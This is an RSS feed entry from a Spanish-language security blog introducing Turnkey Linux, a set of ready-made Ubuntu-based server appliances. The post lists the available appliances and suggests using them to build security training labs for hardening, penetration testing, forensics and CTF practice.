		<description><![CDATA[Turnkey Linux es un proyecto Open Source de desarrollo de appliances libres para la implementación de plataformas tecnológicas . Estas appliances también pueden ser utilizadas para la implementación y puesta en marcha de  Laboratorios de entrenamiento en Seguridad Informática. Turnkey Linux pone a disposición de sus usuarios diferentes entornos en formato LiveCD sobre distintas herramientas [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.turnkeylinux.org/" target="_blank"><strong>Turnkey Linux</strong></a> es un proyecto Open Source de desarrollo de appliances libres para la implementación de plataformas tecnológicas . Estas appliances también pueden ser utilizadas para la implementación y puesta en marcha de  Laboratorios de entrenamiento en Seguridad Informática.</p>
<p style="text-align: justify;"><span id="more-509"></span><a href="http://www.turnkeylinux.org/" target="_blank"><strong>Turnkey Linux</strong></a> pone a disposición de sus usuarios diferentes entornos en formato LiveCD sobre distintas herramientas y plataformas tecnológicas de uso común en empresas, instituciones académicas y gobierno electrónico.</p>
<p style="text-align: justify;">Estas imágenes (.iso y/o VMware) automáticamente una vez iniciadas pondrán en marcha el sistema que nosotros hayamos elegido. Habilitando además un perfecto sistema de administración como lo es <a href="http://www.webmin.com/" target="_blank"><strong>Webmin</strong></a> (aunque podemos administrarlo normalmente de manera local).</p>
<p style="text-align: justify;">Veamos un video demostrativo del proceso de ejecución de los entornos/appliances:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/g-xXHD051eg&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/g-xXHD051eg&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p style="text-align: justify;">Dichos sistemas están basados en la distribución Ubuntu, por lo que el proceso de actualización y administración se facilitará en gran medida.</p>
<p style="text-align: justify;">El uso de dicho proyecto como ambientes virtualizados de entrenamiento en seguridad es muy amplio. Pues con unos simple pasos (Descargar, bootear desde un equipo físico o máquina virtual) tendremos todo un entorno que asemejará uno real, para realizar las prácticas propuestas como entrenamiento (<a href="http://www.sec-track.com/aseguramiento" target="_blank"><strong>Hardening</strong></a>, <strong><a href="http://www.sec-track.com/test-de-penetracion" target="_blank">Penetration Test</a></strong>, <a href="http://www.sec-track.com/tag/vulnerability-scanning" target="_blank"><strong>Análisis  de Código en busca de vulnerabilidades</strong></a>, <a href="http://www.sec-track.com/criptografia" target="_blank"><strong>Análisis de Sistemas Criptográficos</strong></a>, <a href="http://www.sec-track.com/informatica-forense" target="_blank"><strong>Análisis Forense</strong></a>, <strong><a href="http://www.sec-track.com/?s=retos" target="_blank">CTF y Wargames</a></strong>).</p>
<p style="text-align: justify;">Algunos de los entornos disponibles son:</p>
<ul>
<li><a href="http://www.turnkeylinux.org/lamp" target="_blank">LAMP</a></li>
<li><a href="http://www.turnkeylinux.org/drupal6" target="_blank">Drupal</a></li>
<li><a href="http://www.turnkeylinux.org/fileserver" target="_blank">File Server</a></li>
<li><a href="http://www.turnkeylinux.org/openbravo" target="_blank">OpenBravo</a></li>
<li><a href="http://www.turnkeylinux.org/zimbra" target="_blank">Zimbra</a></li>
<li><a href="http://www.turnkeylinux.org/redmine" target="_blank">Redmine</a></li>
<li><a href="http://www.turnkeylinux.org/rails" target="_blank">Ruby on Rails</a></li>
<li><a href="http://www.turnkeylinux.org/torrentserver" target="_blank">Torrent Server</a></li>
<li><a href="http://www.turnkeylinux.org/domain-controller" target="_blank">Domain Controller</a></li>
<li><a href="http://www.turnkeylinux.org/moodle" target="_blank">Moodle</a></li>
<li><a href="http://www.turnkeylinux.org/mediawiki" target="_blank">MediaWiki</a></li>
<li><a href="http://www.turnkeylinux.org/wordpress" target="_blank">WordPress</a></li>
<li><a href="http://www.turnkeylinux.org/joomla" target="_blank">Joomla</a></li>
<li><a href="http://www.turnkeylinux.org/postgresql" target="_blank">PostGreSQL</a></li>
<li><a href="http://www.turnkeylinux.org/tomcat-apache" target="_blank">Tomcat on Apache</a></li>
<li><a href="http://www.turnkeylinux.org/phpbb" target="_blank">phpBB</a></li>
<li><a href="http://www.turnkeylinux.org/lapp" target="_blank">LAPP</a></li>
<li><a href="http://www.turnkeylinux.org/dokuwiki" target="_blank">DokuWiki</a></li>
<li><a href="http://www.turnkeylinux.org/projectpier" target="_blank">ProjectPier</a></li>
<li><a href="http://www.turnkeylinux.org/symfony" target="_blank">Symfony</a></li>
<li><a href="http://www.turnkeylinux.org/bugzilla" target="_blank">BugZilla</a></li>
<li><a href="http://www.turnkeylinux.org/mantis" target="_blank">Mantis</a></li>
<li><a href="http://www.turnkeylinux.org/ec2sdk" target="_blank">SDK for Amazon EC2</a></li>
</ul>
<p><a href="http://www.turnkeylinux.org/screenshots" target="_blank"><strong>ScreenShots del proyecto &gt;&gt;</strong></a></p>
<p><strong><a href="http://www.turnkeylinux.org/docs/installation-appliances-virtualbox" target="_blank">Tutorial de Instalaciónen VirtualBox &gt;&gt;</a></strong></p>
<p><a href="http://www.turnkeylinux.org" target="_blank"><strong>Más información y descargas del Proyecto Turnkey Linux &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Served from: www.sec-track.com @ 2012-02-09 20:38:00 -->
